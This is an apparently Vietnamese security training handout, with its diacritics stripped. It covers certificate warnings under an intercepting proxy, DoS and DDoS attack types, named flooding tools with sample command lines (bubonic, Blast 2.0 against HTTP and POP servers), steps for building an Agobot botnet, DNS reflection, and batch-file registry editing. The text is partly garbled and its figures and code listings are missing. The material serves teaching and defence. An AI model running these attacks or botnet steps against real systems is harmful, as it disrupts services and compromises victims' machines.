I-train.com.vn Professional Training Service
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
b. Khi truy cp i qua mt Intercept Proxy
+ Truy cp vo Gmail s xut hin ca s ny thng bo Certificate
ca bn b li c tip tc hay khng. Nu thy biu tng ny
khuyn co ngi dng khng nn tip tc v kim tra li an ton
ca mng v my tnh trc khi truy cp
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
+ Nu ngi dng tip tc truy cp vo trang Gmail s khng c biu
tng cc kha m thay vo l biu tng Certificate Error.
+ Nhn xem Certificate ny chng ta s thy Certificate ny khng
phi do Verisign sinh ra
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Note: Nu ngi dng thy hai yu t ny khuyn co khng nn tip tc
vo Gmail v Username v password ca bn hon ton c th b mt. Ngoi
ra ngi dng khng nn lu mt khu t ng truy cp bi khi my tnh
ri vo tay ngi khc th thng tin cn lu li trn IE, Firefox hon toan c
th b khai thc d dng. Ngi dng cng nn ci t cc chng trnh dit
Virus ngn chn cc loi Virus, Keylogger n chm mt khu.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Phn IV. Tn cng DoS/DDoS v cch phng chng
Ni dung chi tit trong bi vit:
1. Lch s cc cuc tn cng DoS v DDoS
2. nh ngha v: Denial of Service Attack
3. Cc dng tn cng DoS
4. Cc tool tn cng DoS
5. Mng BOT net
6. Tn cng DDoS
7. Phn loi tn cng DDoS
8. Cc tools tn cng DDoS
9. Su my tnh (worms) trong tn cng DDoS
I. Lch s ca tn cng DoS
1. Mc tiu
- Mc tiu cc cuc tn cng thng vo cc trang web ln v cc t chc thng
mi in t trn Internet.
2. Cc cuc tn cng.
- Vo ngy 15 thng 8 nm 2003, Microsoft chu t tn cng DoS cc mnh v
lm gin on websites trong vng 2 gi.
- Vo lc 15:09 gi GMT ngy 27 thng 3 nm 2003: ton b phin bn ting anh
ca website Al-Jazeera b tn cng lm gin on trong nhiu gi
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
II. nh ngha v tn cng DoS
Tn cng DoS l kiu tn cng v cng nguy him, hiu c n ta cn phi
lm r nh ngha ca tn cng DoS v cc dng tn cng DoS.
- Tn cng DoS l mt kiu tn cng m mt ngi lm cho mt h thng khng
th s dng, hoc lm cho h thng chm i mt cch ng k vi ngi dng
bnh thng, bng cch lm qu ti ti nguyn ca h thng.
- Nu k tn cng khng c kh nng thm nhp c vo h thng, th chng c
gng tm cch lm cho h thng sp v khng c kh nng phc v ngi
dng bnh thng l tn cng Denial of Service (DoS).
Mc d tn cng DoS khng c kh nng truy cp vo d liu thc ca h thng
nhng n c th lm gin on cc dch v m h thng cung cp. Nh nh
ngha trn DoS khi tn cng vo mt h thng s khai thc nhng ci yu nht ca
h thng tn cng, nhng mc ch ca tn cng DoS:
1. Cc mc ch ca tn cng DoS
- C gng chim bng thng mng v lm h thng mng b ngp (flood), khi
h thng mng s khng c kh nng p ng nhng dch v khc cho ngi dng
bnh thng.
- C gng lm ngt kt ni gia hai my, v ngn chn qu trnh truy cp vo dch
v.
- C gng ngn chn nhng ngi dng c th vo mt dch v no
- C gng ngn chn cc dch v khng cho ngi khc c kh nng truy cp vo.
- Khi tn cng DoS xy ra ngi dng c cm gic khi truy cp vo dch v nh
b:
+ Disable Network - Tt mng
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
+ Disable Organization - T chc khng hot ng
+ Financial Loss Ti chnh b mt
2. Mc tiu m k tn cng thng s dng tn cng DoS
Nh chng ta bit bn trn tn cng DoS xy ra khi k tn cng s dng ht ti
nguyn ca h thng v h thng khng th p ng cho ngi dng bnh thng
c vy cc ti nguyn chng thng s dng tn cng l g:
- To ra s khan him, nhng gii hn v khng i mi ti nguyn
- Bng thng ca h thng mng (Network Bandwidth), b nh, a, v CPU
Time hay cu trc d liu u l mc tiu ca tn cng DoS.
- Tn cng vo h thng khc phc v cho mng my tnh nh: h thng iu ho,
h thng in, ht hng lm mt v nhiu ti nguyn khc ca doanh nghip. Bn
th tng tng khi ngun in vo my ch web b ngt th ngi dng c th
truy cp vo my ch khng.
- Ph hoi hoc thay i cc thng tin cu hnh.
- Ph hoi tng vt l hoc cc thit b mng nh ngun in, iu ho
III. Cc dng tn cng
Tn cng Denial of Service chia ra lm hai loi tn cng
- Tn cng DoS: Tn cng t mt c th, hay tp hp cc c th.
- Tn cng DDoS: y l s tn cng t mt mng my tnh c thit k tn
cng ti mt ch c th no .
1. Cc dng tn cng DoS
- Smurf
- Buffer Overflow Attack
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Ping of Death
- Teardrop
- SYN Attack
a. Tn cng Smurf
- L th phm sinh ra cc nhiu giao tip ICMP (ping) ti a ch Broadcast ca
nhiu mng vi a ch ngun l mc tiu cn tn cng.
* Chng ta cn lu l: Khi ping ti mt a ch l qu trnh hai chiu Khi my
A ping ti my B my B reply li hon tt qu trnh. Khi ti ping ti a ch
Broadcast ca mng no th ton b cc my tnh trong mng s Reply li
ti. Nhng gi ti thay i a ch ngun, thay a ch ngun l my C v ti ping
ti a ch Broadcast ca mt mng no , th ton b cc my tnh trong mng
s reply li vo my C ch khng phi ti v l tn cng Smurf.
- Kt qu ch tn cng s phi chu nhn mt t Reply gi ICMP cc ln v lm
cho mng b dt hoc b chm li khng c kh nng p ng cc dch v khc.
- Qu trnh ny c khuych i khi c lung ping reply t mt mng c kt
ni vi nhau (mng BOT).
- tn cng Fraggle, chng s dng UDP echo v tng t nh tn cng Smurf.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Hnh hin th tn cng DoS - dng tn cng Smurf s dng gi ICMP lm ngp cc
giao tip khc.
b. Tn cng Buffer overflow.
- Buffer Overflow xy ra ti bt k thi im no c chng trnh ghi lng thng
tin ln hn dung lng ca b nh m trong b nh.
- K tn cng c th ghi ln d liu v iu khin chy cc chng trnh v
nh cp quyn iu khin ca mt s chng trnh nhm thc thi cc on m
nguy him. - Tn cng Buffer Overflow ti trnh by cch khai thc li ny
trong bi vit trc v hacking windows cng trn trang www.vnexperts.net.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Qu trnh gi mt bc th in t m file nh km di qu 256 k t c th s
xy ra qu trnh trn b nh m.
c. Tn cng Ping of Death
- K tn cng gi nhng gi tin IP ln hn s lng bytes cho php ca tin IP l
65.536 bytes.
- Qu trnh chia nh gi tin IP thnh nhng phn nh c thc hin layer II.
- Qu trnh chia nh c th thc hin vi gi IP ln hn 65.536 bytes. Nhng h
iu hnh khng th nhn bit c ln ca gi tin ny v s b khi ng li,
hay n gin l s b gin on giao tip.
- nhn bit k tn cng gi gi tin ln hn gi tin cho php th tng i d
dng.
d. Tn cng Teardrop
- Gi tin IP rt ln khi n Router s b chia nh lm nhiu phn nh.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- K tn cng s dng s dng gi IP vi cc thng s rt kh hiu chia ra cc
phn nh (fragment).
- Nu h iu hnh nhn c cc gi tin c chia nh v khng hiu c, h
thng c gng build li gi tin v iu chim mt phn ti nguyn h thng, nu
qu trnh lin tc xy ra h thng khng cn ti nguyn cho cc ng dng khc,
phc v cc user khc.
e. Tn cng SYN
- K tn cng gi cc yu cu (request o) TCP SYN ti my ch b tn cng.
x l lng gi tin SYN ny h thng cn tn mt lng b nh cho kt ni.
- Khi c rt nhiu gi SYN o ti my ch v chim ht cc yu cu x l ca my
ch. Mt ngi dng bnh thng kt ni ti my ch ban u thc hin Request
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
TCP SYN v lc ny my ch khng cn kh nng p li - kt ni khng c
thc hin.
- y l kiu tn cng m k tn cng li dng qu trnh giao tip ca TCP theo
Three-way.
- Cc on m nguy him c kh nng sinh ra mt s lng cc ln cc gi TCP
SYN ti my ch b tn cng, a ch IP ngun ca gi tin b thay i v
chnh l tn cng DoS.
- Hnh bn trn th hin cc giao tip bnh thng vi my ch v bn di th
hin khi my ch b tn cng gi SYN n s rt nhiu trong khi kh nng tr
li ca my ch li c hn v khi my ch s t chi cc truy cp hp php.
- Qu trnh TCP Three-way handshake c thc hin: Khi my A mun giao tip
vi my B. (1) my A bn ra mt gi TCP SYN ti my B (2) my B khi nhn
c gi SYN t A s gi li my A gi ACK ng kt ni (3) my A gi li
my B gi ACK v bt u cc giao tip d liu.
- My A v my B s d kt ni t nht l 75 giy, sau li thc hin mt qu
trnh TCP Three-way handshake ln na thc hin phin kt ni tip theo
trao i d liu.
- Tht khng may k tn cng li dng k h ny thc hin hnh vi tn cng
nhm s dng ht ti nguyn ca h thng bng cch gim thi gian yu cu
Three-way handshake xung rt nh v khng gi li gi ACK, c bn gi SYN ra
lin tc trong mt thi gian nht nh v khng bao gi tr li li gi SYN&ACK
t my b tn cng.
- Vi nguyn tc ch chp nhn gi SYN t mt my ti h thng sau mi 75 giy
nu a ch IP no vi phm s chuyn vo Rule deny access s ngn cn tn cng
ny.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
IV. Cc cng c tn cng DoS
- Jolt2
- Bubonic.c
- Land and LaTierra
- Targa
- Blast20
- Nemesy
- Panther2
- Crazy Pinger
- Some Trouble
- UDP Flood
- FSMax
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
1. Tools DoS Jolt2
- Cho php k tn t chi dch v (DoS) ln cc h thng trn nn tng Windows
- N l nguyn nhn khin my ch b tn cng c CPU lun hot ng mc
100%, CPU khng th x l cc dch v khc.
- Khng phi trn nn tng Windows nh Cisco Router v mt s loi Router khc
cng c th b l hng bo mt ny v b tools ny tn cng.
2. Tools DoS: Bubonic.c
- Bubonic.c l mt tools DoS da vo cc l hng bo mt trn Windows 2000
- N hot ng bng cch ngu nhin gi cc gi tin TCP vi cc thit lp ngu
nhin lm cho my ch tn rt nhiu ti nguyn x l vn ny, v t s
xut hin nhng l hng bo mt.
- S dng bubonic.c bng cch g cu lnh: bubonic 12.23.23.2 10.0.0.1 100
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
3. Tools DoS: Land and LaTierra
- Gi mo a ch IP c kt hp vi qu trnh m cc kt ni gia hai my tnh.
- C hai a ch IP, a ch ngun (source) v a ch IP ch, c chnh sa thnh
mt a ch ca IP ch khi kt ni gia my A v my B ang c thc hin
nu c tn cng ny xy ra th kt ni gia hai my A v B s b ngt kt ni.
- Kt qu ny do a ch IP ngun v a ch IP ch ca gi tin ging nhau v gi
tin khng th i n ch cn n.
4. Tools DoS: Targa
- Targa l mt chng chnh c th s dng 8 dng tn cng DoS khc nhau.
- N c coi nh mt b hng dn tch hp ton b cc nh hng ca DoS v
thng l cc phin bn ca Rootkit.
- K tn cng s dng mt trong cc phng thc tn cng c th ti mt h thng
bao gi t c mc ch th thi.
- Targa l mt chng trnh y sc mnh v n c kh nng to ra mt s nguy
him rt ln cho h thng mng ca mt cng ty.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
5. Tools DoS Blast 2.0
- Blast rt nh, l mt cng c dng kim tra kh nng ca dch v TCP n c
kh nng to ra mt lu lng rt ln gi TCP v c th s gay nguy him cho mt
h thng mng vi cc server yu.
- Di y l cch s dng tn cng HTTP Server s dng Blast2.0
+ Blast 192.168.1.219 80 40 50 /b GET /some /e url/ HTTP/1.0 /nr /dr /v
- Tn cng my ch POP
+ Blast 192.168.1.219 110 15 20 /b user te /e d /v
6. Tools DoS Nemesys
- y l mt chng trnh sinh ra nhng gi tin ngu nhin nh (protocol, port, etc.
size, )
- Da vo chng trnh ny k tn cng c th chy cc on m nguy him vo
my tnh khng c bo mt.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
7. Tool DoS Panther2.
- Tn cng t chi dch v da trn nn tng UDP Attack c thit k dnh ring
cho kt ni 28.8 56 Kbps.
- N c kh nng chim ton b bng thng ca kt ni ny.
- N c kh nng chim bng thng mng bng nhiu phng php v nh thc
hin qu trnh Ping cc nhanh v c th gy ra tn cng DoS
8. Tool DoS Crazy Pinger
- Cng c ny c kh nng gi nhng gi ICPM ln ti mt h thng mng t xa.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
9. Tool DoS Some Trouble
- SomeTrouble 1.0 l mt chng trnh gy nghn h thng mng
- SomeTrouble l mt chng trnh rt n gin vi ba thnh phn
+ Mail Bomb (t c kh nng Resole Name vi a ch mail c)
+ ICQ Bomb
+ Net Send Flood
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
10. DoS Tools UDP Flood
- UDPFlood l mt chng trnh gi cc gi tin UDP
- N gi ra ngoi nhng gi tin UDP ti mt ac h IP v port khng c nh
- Gi tin c kh nng l mt on m vn bn hay mt s lng d liu c sinh
ngu nhin hay t mt file.
- c s dng kim tra kh nng p ng ca Server
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
11. Tools DoS FSMAX
- Kim tra hiu nng p ng ca my ch.
- N to ra mt file sau chy trn Server nhiu ln lp i lp li mt lc.
- Tc dng ca tools ny l tm cch tn cng lm chn b nh m v tn cng
DoS ti my ch.
V. Kt lun phn I.
- Khi s dng mt Tool tn cng DoS ti mt my ch i khi khng gy nh
hng g cho my ch - Gi s bn s dng tool Ping of Death ti mt my ch,
trong my ch kt ni vi mng tc 100Mbps bn kt ni ti my ch tc
3Mbps - Vy tn cng ca bn khng c ngha g.
- Nhng bn hy tng tng c 1000 ngi nh bn cng mt lc tn cng vo
my ch kia khi ton b bng thng ca 1000 ngi cng li ti a t 3Gbps
v tc kt ni ca my ch l 100 Mbps vy kt qu s ra sao cc bn c kh
nng tng tng.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Trong phn II ca lot bi vit ti s trnh by vi cc bn nhng ni dung v
nh ngha BOT, BOTNET, cch xy dng, cch s dng cc BOTNET t
chng ta hiu cch hot ng v tm ra nhng gii php chng tn cng DDoS
mt cch hiu qu nht.
Theo - Tocbatdat ca Vnexperts Research Department
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Phn tip ca bi vit v tn cng DoS v DDoS ti s trnh by vi cc bn ni
dung chi tit v mng Bot, cc dng mng Bot v cch to ra mng Botnet. Khi
hiu v mng Botnet bn c th hnh dung ra phng thc tn cng DDoS. Trong
phn II ny ti cng trnh by vi cc bn chi tit cc phng thc tn cng DDoS
cc thc hin cc phng thc tn cng ny. Nhng bi vit ny ch c tc dng
gip cc bn hiu bit su v tn cng DDoS m thi, cc tools gii thiu ch mang
tnh gii thiu v n l cc tools DDoS c.
VI. Mng BOT NET
1. ngha ca mng BOT
- Khi s dng mt Tool tn cng DoS ti mt my ch i khi khng gy nh
hng g cho my ch - Gi s bn s dng tool Ping of Death ti mt my ch,
trong my ch kt ni vi mng tc 100Mbps bn kt ni ti my ch tc
3Mbps - Vy tn cng ca bn khng c ngha g.
- Nhng bn hy tng tng c 1000 ngi nh bn cng mt lc tn cng vo
my ch kia khi ton b bng thng ca 1000 ngi cng li ti a t 3Gbps
v tc kt ni ca my ch l 100 Mbps vy kt qu s ra sao cc bn c kh
nng tng tng.
- Nhng ti ang th hi lm cch no c 1000 my tnh kt ni vi mng ti
i mua mt nghn chic v thu 1000 thu bao kt ni - chc chn ti khng lm
nh vy ri v cng khng k tn cng no s dng phng php ny c.
- K tn cng xy dng mt mng gm hng nghn my tnh kt Internet (c mng
BOT ln ti 400.000 my). Vy lm th no chng c kh nng li dng ngi kt
ni ti Internet xy dng mng BOT trong bi vit ny ti s gii thiu vi cc
bn cc mng BOT v cch xy dng, nhng Tool xy dng.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Khi c trong tay mng BOT k tn cng s dng nhng tool tn cng n gin
tn cng vo mt h thng my tnh. Da vo nhng truy cp hon ton hp l ca
h thng, cng mt lc chng s dng mt dch v ca my ch, bn th tng
tng khi k tn cng c trong tay 400.000 my ch v cng mt lc ra lnh cho
chng download mt file trn trang web ca bn. V chnh l DDoS
Distributed Denial of Servcie
- Khng c mt phng thc chng tn cng DDoS mt cch hon ton nhng
trong bi vit ny ti cng gii thiu vi cc bn nhng phng php phng chng
DDoS khi chng ta hiu v n.
2. Mng BOT
- BOT t vit tt ca t RoBOT
- IRCbot cn c gi l zombia hay drone.
- Internet Relay Chat (IRC) l mt dng truyn d liu thi gian thc trn Internet.
N thng c thit k sao cho mt ngi c th nhn c cho mt group v
mi ngi c th giao tip vi nhau vi mt knh khc nhau c gi l
Channels.
- u tin BOT kt ni knh IRC vi IRC Server v i giao tip gia nhng
ngi vi nhau.
- K tn cng c th iu khin mng BOT v s dng mng BOT cng nh s
dng nhm mt mc ch no .
- Nhiu mng BOT kt ni vi nhau ngi ta gi l BOTNET botnet.
3. Mng Botnet.
- Mng Botnet bao gm nhiu my tnh
- N c s dng cho mc ch tn cng DDoS
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Mt mng Botnet nh c th ch bao gm 1000 my tnh nhng bn th tng
tng mi my tnh ny kt ni ti Internet tc ch l 128Kbps th mng Botnet
ny c kh nng to bng thng l 1000*128 ~ 100Mbps y l mt con s
th hin bng thng m kh mt nh Hosting no c th share cho mi trang web
ca mnh.
4. Mc ch s dng mng Botnets
- Tn cng Distributed Denial-of-Service - DDoS
+ Botnet c s dng cho tn cng DDoS
- Spamming
+ M mt SOCKS v4/v5 proxy server cho vic Spamming
- Sniffing traffic
+ Bot cng c th s dng cc gi tin n sniffer (tm c cc giao tip trn mng)
sau khi tm c cc gi tin n c gng gii m gi tin ly c cc ni dung
c ngha nh ti khon ngn hng v nhiu thng tin c gi tr khc ca ngi s
dng.
- Keylogging
+ Vi s tr gip ca Keylogger rt nhiu thng tin nhy cm ca ngi dng c
th s b k tn cng khai thc nh ti khon trn e-banking, cng nh nhiu ti
khon khc.
- Ci t v ly nhim chng trnh c hi
+ Botnet c th s dng to ra mng nhng mng BOT mi.
- Ci t nhng qung co Popup
+ T ng bt ra nhng qung co khng mong mun vi ngi s dng.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Google Adsense abuse
+ T ng thay i cc kt qu tm kim hin th mi khi ngi dng s dng dch
v tm kim ca Google, khi thay i kt qu n s la ngi dng kch vo nhng
trang web nguy him.
- Tn cng vo IRC Chat Networks
+ N c gi l clone attack
- Phishing
+ Mng botnet cn c s dng phishing mail nhm ly cc thng tin nhy
cm ca ngi dng.
5. Cc dng ca mng BOT.
Agobot/Phatbot/Forbot/XtremBot
- y l nhng bot c vit bng C++ trn nn tng Cross-platform v m ngun
c tm trn GPL. Agobot c vit bi Ago nick name c ngi ta bit n l
Wonk, mt thanh nin tr ngi c b bt hi thng 5 nm 2004 vi ti danh
v ti phm my tnh.
- Agobot c kh nng s dng NTFS Alternate Data Stream (ADS) v nh mt
loi Rootkit nhm n cc tin trnh ang chy trn h thng
SDBot/Rbot/UrBot/UrXbot
- SDBot c vit bng ngn ng C v cng c public bi GPL. N c coi
nh l tin thn ca Rbot, RxBot, UrBot, UrXBot, JrBot
mIRC-Based Bots GT-Bots
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- GT c vit tt t fhai t Global Threat v tn thng c s dng cho tt c
cc mIRC-scripted bots. N c kh nng s dng phn mm IM l mIRC thit
lp mt s script v mt s on m khc.
6. Cc bc xy dng mng BotNet? Cch phn tch mng Bot.
hiu hn v xy dng h thng mng BotNet chng ta nghin cu t cch ly
nhim vo mt my tnh, cch to ra mt mng Bot v dng mng Bot ny tn
cng vo mt ch no ca mng Botnet c to ra t Agobots.
Bc 1: Cch ly nhim vo my tnh.
- u tin k tn cng la cho ngi dng chy file chess.exe, mt Agobot
thng copy chng vo h thng v s thm cc thng s trong Registry m
bo s chy cng vi h thng khi khi ng. Trong Registry c cc v tr cho cc
ng dng chy lc khi ng ti.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
Bc 2: Cch ly lan v xy dng to mng BOTNET
- Sau khi trong h thng mng c mt my tnh b nhim Agobot, n s t ng
tm kim cc my tnh khc trong h thng v ly nhim s dng cc l hng trong
ti nguyn c chia s trong h thng mng.
- Chng thng c gng kt ni ti cc d liu share mc nh dnh cho cc ng
dng qun tr (administrator or administrative) v d nh: C$, D$, E$ v print$
bng cch on usernames v password c th truy cp c vo mt h thng
khc v ly nhim.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Agobot c th ly lan rt nhanh bi chng c kh nng tn dng cc im yu
trong h iu hnh Windows, hay cc ng dng, cc dch v chy trn h thng.
Bc 3: Kt ni vo IRC.
- Bc tip theo ca Agobot s to ra mt IRC-Controlled Backdoor m cc
yu t cn thit, v kt ni ti mng Botnet thng qua IRC-Controll, sau khi kt
ni n s m nhng dch v cn thit khi c yu cu chng s c iu khin
bi k tn cng thng qua knh giao tip IRC.
Bc 4: iu khin tn cng t mng BotNet.
- K tn cng iu khin cc my trong mng Agobot download nhng file .exe v
chy trn my.
- Ly ton b thng tin lin quan v cn thit trn h thng m k tn cng mun.
- Chy nhng file khc trn h thng p ng yu cu ca k tn cng.
- Chy nhng chng trnh DDoS tn cng h thng khc.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
7. S cch h thng b ly nhim v s dng Agobot.
VII. Cc tools tn cng DDoS
1. Nuclear Bot.
- Nuclear Bot l mt tool cc mnh Multi Advanced IRC BOT c th s dng
Floods, Managing, Utilities, Spread, IRC Related, tn cng DDoS v nhiu mc
ch khc.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
VIII. Tn cng DDoS
Trn Internet tn cng Distributed Denial of Service l mt dng tn cng t nhiu
my tnh ti mt ch, n gy ra t chi cc yu cu hp l ca cc user bnh
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
thng. Bng cch to ra nhng gi tin cc nhiu n mt ch c th, n c th
gy tnh trng tng t nh h thng b shutdown.
1. Cc c tnh ca tn cng DDoS.
- N c tn cng t mt h thng cc my tnh cc ln trn Internet, v thng
da vo cc dch v c sn trn cc my tnh trong mng botnet
- Cc dch v tn cng c iu khin t nhng primary victim trong khi cc
my tnh b chim quyn s dng trong mng Bot c s dng tn cng
thng c gi l secondary victims.
- L dng tn cng rt kh c th pht hin bi tn cng ny c sinh ra t nhiu
a ch IP trn Internet.
- Nu mt a ch IP tn cng mt cng ty, n c th c chn bi Firewall. Nu
n t 30.000 a ch IP khc, th iu ny l v cng kh khn.
- Th phm c th gy nhiu nh hng bi tn cng t chi dch v DoS, v iu
ny cng nguy him hn khi chng s dng mt h thng mng Bot trn internet
thc hin tn cng DoS v c gi l tn cng DDoS.
2. Tn cng DDoS khng th ngn chn hon ton.
- Cc dng tn cng DDoS thc hin tm kim cc l hng bo mt trn cc my
tnh kt ni ti Internet v khai thc cc l hng bo mt xy dng mng Botnet
gm nhiu my tnh kt ni ti Internet.
- Mt tn cng DDoS c thc hin s rt kh ngn chn hon ton.
- Nhng gi tin n Firewall c th chn li, nhng hu ht chng u n t
nhng a ch IP cha c trong cc Access Rule ca Firewall v l nhng gi tin
hon ton hp l.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Nu a ch ngun ca gi tin c th b gi mo, sau khi bn khng nhn c s
phn hi t nhng a ch ngun tht th bn cn phi thc hin cm giao tip vi
a ch ngun .
- Tuy nhin mt mng Botnet bao gm t hng nghn ti vi trm nghn a ch IP
trn Internet v iu l v cng kh khn ngn chn tn cng.
3. K tn cng khn ngoan.
Gi y khng mt k tn cng no s dng lun a ch IP iu khin mng
Botnet tn cng ti ch, m chng thng s dng mt i tng trung gian di
y l nhng m hnh tn cng DDoS
a. Agent Handler Model
K tn cng s dng cc handler iu khin tn cng
b. Tn cng DDoS da trn nn tng IRC
K tn cng s dng cc mng IRC iu khin, khuych i v qun l kt ni
vi cc my tnh trong mng Botnet.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
IX. Phn loi tn cng DDoS
- Tn cng gy ht bng thng truy cp ti my ch.
+ Flood attack
+ UDP v ICMP Flood (flood gy ngp lt)
- Tn cng khuch i cc giao tip
+ Smurf and Fraggle attack
Tn cng DDoS vo Yahoo.com nm 2000
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
S phn loi tn cng DDoS
S tn cng DDoS dng Khuch i giao tip.
Nh cc bn bit tn cng Smurf khi s dng s Ping n a ch Broadcast ca
mt mng no m a ch ngun chnh l a ch ca my cn tn cng, khi
ton b cc gi Reply s c chuyn ti a ch IP ca my tnh b tn cng.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
X. Tn cng Reflective DNS (reflective - phn chiu).
1. Cc vn lin quan ti tn cng Reflective DNS
- Mt Hacker c th s dng mng botnet gi rt nhiu yu cu ti my ch
DNS.
- Nhng yu cu s lm trn bng thng mng ca cc my ch DNS,
- Vic phng chng dng tn cng ny c th dng Firewall ngn cm nhng giao
tip t cc my tnh c pht hin ra.
- Nhng vic cm cc giao tip t DNS Server s c nhiu vn ln. Mt DNS
Server c nhim v rt quan trng trn Internet.
- Vic cm cc giao tip DNS ng ngha vi vic cm ngi dng bnh thng
gi mail v truy cp Website.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Mt yu cu v DNS thng chim bng 1/73 thi gian ca gi tin tr li trn
my ch. Da vo yu t ny nu dng mt Tools chuyn nghip lm tng cc
yu cu ti my ch DNS s khin my ch DNS b qu ti v khng th p ng
cho cc ngi dng bnh thng c na.
2. Tool tn cng Reflective DNS ihateperl.pl
- ihateperl.pl l chng trnh rt nh, rt hiu qu, da trn kiu tn cng DNS-
Reflective
- N s dng mt danh sch cc my ch DNS lm trn h thng mng vi cc
gi yu cu Name Resolution.
- Bng mt v d n c th s dng google.com resole gi ti my ch v c th
i tn domain thnh www.vnexperts.net hay bt k mt trang web no m k
tn cng mun.
- s dng cng c ny, rt n gin bn to ra mt danh sch cc my ch
DNS, chuyn cho a ch IP ca my c nhn v thit lp s lng cc giao tip.
XI. Cc tools s dng tn cng DDoS.
Trong ton b cc tools ti gii thiu trong bi vit ny hu ht l cc tools c v
khng hiu qu, v ch mang tnh cht s phm cc bn c th hiu v dng tn
cng DDoS hn m thi. Di y l cc Tools tn cng DDoS.
- Trinoo - Tribe flood Network (TFN) - TFN2K - Stacheldraht
- Shaft
- Trinity - Knight - Mstream - Kaiten
Cc tools ny bn hon ton c th Download min ph trn Internet v lu l ch
th y l cc tools yu v ch mang tnh Demo v tn cng DdoS m thi.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Phn VI. K thut edit Registry bng cu lnh v ng dng bo mt
1. Vai tr ca command line
2. To ra file .bat thc thi t ng mt s thao tc
3. Cu hnh REGISTRY bng file.bat
4. ng dng cu hnh REGISTRY
5. Kt lun
1. Vai tr ca Command Line
- Bt k ngi qun tr h thng no cng phi s dng giao din cu lnh ca cc
h iu hnh. Trong h thng Windows cu lnh cng c s dng em li s
thun tin v tnh linh hot trong vic qun tr.
2. To ra file.bat thc thi t ng mt s thao tc
- Giao din cu lnh khi c thc hin di dng file.bat cho php thc hin
nhiu cu lnh lin tip.
- V d 1: s dng notepad vit ni dung di y v save ra file.bat:
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Khi chy file.bat ny h thng s thc hin (1) to ra user vi tn tocbatdat (2) add
user vo Group Administrators (3) Disabled Service DHCP Client (4) Tt
Service DHCP Client (5) khi ng li my ngay lp tc. (Cc cu lnh NET, SC,
Shutdown u c cc Options cc bn c th s dng bng cch g cu lnh ri
thm /? s hin cc options ca cu lnh ).
Mt s cu lnh hay s dng:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP |
HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND |
SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW
] cho php to user, group, xem cc thng tin truy cp v mng ca my tnh.
NETSH cu lnh ny cho php thit lp tt c mi thng s lin quan ti
network nh: a ch IP, DNS, routing
WMIC Trong giao din ny cung cp rt nhiu options qun l my tnh
- V d 2: to ra mt file.bat nhm mc ch to ra mt file vi ni dung l cc cu
hnh ca my tnh:
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Vi file.bat ni dung nh trn s to ra c mt file l c.txt vi ni dung: IP,
cc tin trnh ang hot ng, cc user trong my tnh, cc port m, cc services
ang hot ng, nhng thng tin chung trong h thng, cu trc th mc ca
C.Nh vy vi mt file.bat c to ra c th ly rt nhiu thng tin ca my
tnh.
3. Cu hnh REGISTRY bng file.bat
Mun cu hnh Registry chng ta phi lm cch no thc hin c hai tc v:
Bc 1: to ra file.reg vi ni dung mong mun bng cu lnh
Bc 2: chy file.reg va to ra
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
V d 3: chng ta cn to ra file.reg vi ni dung nh sau:
to ra file.reg vi ni dung nh trn bng mt file.bat nh sau:
Mt file.bat vi ni dung nh trn s thc hin nhng tc v g:
